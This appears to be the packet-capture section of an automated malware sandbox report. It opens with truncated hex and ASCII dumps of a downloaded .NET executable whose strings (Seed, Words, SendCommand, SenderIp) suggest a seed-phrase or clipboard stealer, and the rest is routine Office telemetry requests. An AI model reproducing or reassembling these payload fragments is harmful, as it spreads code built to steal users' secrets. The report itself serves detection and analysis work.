Nov 2, 2024 17:57:07.136688948 CET	1236	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:57:07 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Fri, 01 Nov 2024 13:21:33 GMT ETag: "1aa00-625d9d04b7140" Accept-Ranges: bytes Content-Length: 109056 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 88 e9 26 88 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 32 01 00 00 76 00 00 00 00 00 00 9e 51 01 00 00 20 00 00 00 60 01 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 02 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c 51 01 00 4f 00 00 00 00 60 01 00 20 73 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 01 00 0c 00 00 00 9c 50 01 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL&"02vQ `@ `LQO` sP8 H.text1 2 `.rsrc s`t4@@.reloc@BQHd09j> 4(2o:o0,orp $%%ot&o(Jr!ps(Js%oo&( 6(!(0${,}rKps("f3t}}(#~-rp($o%s&~~*~('Vs((t{"}0Gs)
Nov 2, 2024 17:57:07.136719942 CET	1236	IN	Data Raw: 0a 0a 02 28 14 00 00 06 0b 16 0c 2b 19 07 08 9a 0d 06 09 6f 2a 00 00 0a 26 06 1f 20 6f 2b 00 00 0a 26 08 17 58 0c 08 07 8e 69 32 e1 06 06 6f 2c 00 00 0a 17 59 17 6f 2d 00 00 0a 26 06 6f 2e 00 00 0a 2a 52 02 1f 18 8d 3e 00 00 01 7d 06 00 00 04 02 Data Ascii: (+o& o+&Xi2o,Yo-&o.R>}(#*0(Zs}rpsv}{s}s}(\|}{-{oPs/sQ}Os/sQ}(M
Nov 2, 2024 17:57:07.136734009 CET	1236	IN	Data Raw: 1f 16 9a 2a 6e 02 7b 0c 00 00 04 6f 14 00 00 06 1f 16 03 a2 02 72 43 02 00 70 28 58 00 00 06 2a 3e 02 7b 0c 00 00 04 6f 14 00 00 06 1f 17 9a 2a 6e 02 7b 0c 00 00 04 6f 14 00 00 06 1f 17 03 a2 02 72 51 02 00 70 28 58 00 00 06 2a 1e 02 7b 0d 00 00 Data Ascii: n{orCp(X>{on{orQp(X{{{ow(-(N{o~(~(%-&~'s0%(s1%o2%o3o40(5B% o6i/*(
Nov 2, 2024 17:57:07.137062073 CET	1236	IN	Data Raw: 00 00 00 00 1d 8d 3e 00 00 01 25 16 72 e5 02 00 70 a2 25 17 02 28 69 00 00 06 a2 25 18 72 15 03 00 70 a2 25 19 02 28 6b 00 00 06 a2 25 1a 72 43 03 00 70 a2 25 1b 02 28 6d 00 00 06 a2 25 1c 72 71 03 00 70 a2 28 52 00 00 0a 2a 00 13 30 04 00 3e 00 Data Ascii: >%rp%(i%rp%(k%rCp%(m%rqp(R0>{(d(foS{oTop(UoVioWJsX}(#0%%uR,R-+33*0"%u3
Nov 2, 2024 17:57:07.137074947 CET	1236	IN	Data Raw: 00 00 06 73 80 00 00 0a 6f 81 00 00 0a 2a 00 00 42 53 4a 42 01 00 01 00 00 00 00 00 0c 00 00 00 76 34 2e 30 2e 33 30 33 31 39 00 00 00 00 05 00 6c 00 00 00 fc 17 00 00 23 7e 00 00 68 18 00 00 b8 15 00 00 23 53 74 72 69 6e 67 73 00 00 00 00 20 2e Data Ascii: so*BSJBv4.0.30319l#~h#Strings .x#US3#GUID3#BlobW3b(UJ(N
Nov 2, 2024 17:57:07.137087107 CET	1236	IN	Data Raw: 21 00 9a 04 4d 03 21 00 b7 04 4d 03 21 00 cd 0a 52 03 21 00 c1 0a 5a 03 01 00 05 04 62 03 01 00 57 03 29 03 11 00 da 04 0b 02 11 00 66 05 67 03 11 00 0b 05 0b 02 11 00 50 05 67 03 01 00 1f 05 0b 02 01 00 f5 04 0b 02 01 00 84 04 0b 02 21 00 c2 13 Data Ascii: !M!M!R!ZbW)fgPg!j!Z!Q!o!g!&E!QQ!g!sv6rz-~P *` m \| {
Nov 2, 2024 17:57:07.137099981 CET	1236	IN	Data Raw: 00 00 81 00 04 03 06 00 2d 00 34 27 00 00 00 00 81 00 00 0f 06 00 2d 00 70 27 00 00 00 00 81 00 c3 05 db 03 2d 00 84 28 00 00 00 00 81 00 9a 05 db 03 2e 00 dc 28 00 00 00 00 86 18 c8 10 e0 03 2f 00 f2 28 00 00 00 00 e6 09 92 03 f0 03 31 00 fa 28 Data Ascii: -4'-p'-(.(/(1(2)3)4()5`)6)7)8):):):Ie<T
Nov 2, 2024 17:57:07.137111902 CET	1236	IN	Data Raw: 00 00 01 00 16 0b 00 00 01 00 16 0b 00 00 01 00 16 0b 00 00 01 00 40 0c 00 00 01 00 40 0c 00 00 01 00 ce 0a 10 10 02 00 c2 0a 00 00 01 00 16 0b 00 00 01 00 16 0b 00 00 01 00 f5 10 00 00 01 00 86 10 00 00 01 00 16 0b 00 00 01 00 16 0b 10 10 01 00 Data Ascii: @@YVYV8a[
Nov 2, 2024 17:57:07.137135029 CET	1236	IN	Data Raw: 3b 05 c3 00 83 00 ae 05 e0 00 7b 00 3b 05 e0 00 83 00 40 05 00 01 93 00 3b 05 00 01 7b 00 3b 05 00 01 83 00 40 05 60 01 7b 00 3b 05 60 01 83 00 40 05 80 01 7b 00 3b 05 80 01 83 00 40 05 80 01 8b 00 64 05 a1 01 a3 00 3b 05 c1 01 a3 00 3b 05 21 02 Data Ascii: ;{;@;{;@`{;`@{;@d;;!;a;;;;;;;;;;!;;$;`;;;;{;@{;@d; ;@;`;
Nov 2, 2024 17:57:07.137154102 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 ba 02 e0 07 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 ba 02 64 12 00 00 00 00 00 00 00 00 01 00 00 00 87 11 00 00 d0 e5 00 00 01 00 00 00 9f 11 00 00 16 00 08 00 17 00 08 00 00 00 00 00 b3 00 e1 02 7b 00 56 01 00 00 Data Ascii: d{Vget_Word10set_Word10get_Word20set_Word20<>9__89_0<ShowPopup>b__89_0<>c__DisplayClass89_0get_Word11set_Word11get_Word21set_Word21<ShowPopup>b__1Pre
Nov 2, 2024 17:57:07.143137932 CET	1236	IN	Data Raw: 7a 65 64 00 3c 53 65 65 64 3e 6b 5f 5f 42 61 63 6b 69 6e 67 46 69 65 6c 64 00 3c 53 65 6e 64 43 6f 6d 6d 61 6e 64 3e 6b 5f 5f 42 61 63 6b 69 6e 67 46 69 65 6c 64 00 3c 50 61 73 74 65 57 6f 72 64 73 43 6f 6d 6d 61 6e 64 3e 6b 5f 5f 42 61 63 6b 69 Data Ascii: zed<Seed>k__BackingField<SendCommand>k__BackingField<PasteWordsCommand>k__BackingField<BuildName>k__BackingField<Time>k__BackingField<Ip>k__BackingField<SenderIp>k__BackingField<Words>k__BackingField<Port>k__BackingField<DaysDelay>k_

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port
0	192.168.2.7	49699	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:20 UTC	195	OUT	GET /rules/other-Win32-v19.bundle HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:20 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:20 GMT Content-Type: text/plain Content-Length: 218853 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public Last-Modified: Fri, 01 Nov 2024 06:15:12 GMT ETag: "0x8DCFA3C8B31D3C9" x-ms-request-id: 9bc4dc4d-a01e-0084-152e-2c9ccd000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165620Z-15869dbbcc6xcpf8hC1DFWxtx000000000m000000000cfdx x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:20 UTC	15890	IN	Data Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20 Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
2024-11-02 16:56:21 UTC	16384	IN	Data Raw: 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c Data Ascii: <V V="400" T="I32" /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" /> </L> <R> <
2024-11-02 16:56:21 UTC	16384	IN	Data Raw: 30 38 32 30 76 33 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d Data Ascii: 0820v3+<?xml version="1.0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns=""> <S> <A T="1" E=
2024-11-02 16:56:21 UTC	16384	IN	Data Raw: 3c 53 20 54 3d 22 32 22 20 46 3d 22 41 76 65 72 61 67 65 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 31 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 46 69 6c 65 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 38 22 20 Data Ascii: <S T="2" F="Average" /> </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32" I="11" O="true" N="File_Count"> <S T="8"
2024-11-02 16:56:21 UTC	16384	IN	Data Raw: 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 52 65 73 75 6c 74 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e Data Ascii: _False"> <C> <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Count_CreateResult_ValidPersona_False"> <C>
2024-11-02 16:56:21 UTC	16384	IN	Data Raw: 32 22 20 49 3d 22 31 39 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6c 65 61 6e Data Ascii: 2" I="19" O="false" N="Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C> </C> <C T="U32" I="21" O="false" N="Clean
2024-11-02 16:56:21 UTC	16384	IN	Data Raw: 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 Data Ascii: </L> <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R>
2024-11-02 16:56:21 UTC	16384	IN	Data Raw: 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 46 61 69 6c 65 64 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 Data Ascii: > </O> </F> </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIntegrationFirstCallFailedCount"> <C>
2024-11-02 16:56:21 UTC	16384	IN	Data Raw: 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 Data Ascii: <O T="AND"> <L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L> <R> <V V="false" T="B" />
2024-11-02 16:56:21 UTC	16384	IN	Data Raw: 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a Data Ascii: <S T="2" F="HttpStatus" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <L> <S T="2" F="HttpStatus" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
1	192.168.2.7	49701	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:23 UTC	192	OUT	GET /rules/rule224902v2s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:23 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:23 GMT Content-Type: text/xml Content-Length: 450 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT ETag: "0x8DC582BD4C869AE" x-ms-request-id: b9f9811d-201e-0096-2924-2cace6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165623Z-r159446fcd7nszvrhC1DFW2d0g00000001ng0000000070ag x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:23 UTC	450	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN

Session ID	Source IP	Source Port	Destination IP	Destination Port
2	192.168.2.7	49705	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:23 UTC	192	OUT	GET /rules/rule120600v4s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:23 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:23 GMT Content-Type: text/xml Content-Length: 2980 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT ETag: "0x8DC582BA80D96A1" x-ms-request-id: 9d856691-501e-0035-564e-2cc923000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165623Z-r159446fcd7c6lxmhC1DFWw2vn00000001ug000000005hmk x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:23 UTC	2980	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"

Session ID	Source IP	Source Port	Destination IP	Destination Port
3	192.168.2.7	49704	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:23 UTC	192	OUT	GET /rules/rule120609v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:23 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:23 GMT Content-Type: text/xml Content-Length: 408 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT ETag: "0x8DC582BB56D3AFB" x-ms-request-id: 1b669881-b01e-0097-6d1e-2c4f33000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165623Z-176bd8f9bc5t82pjhC1DFWycvg000000023g00000000f8up x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
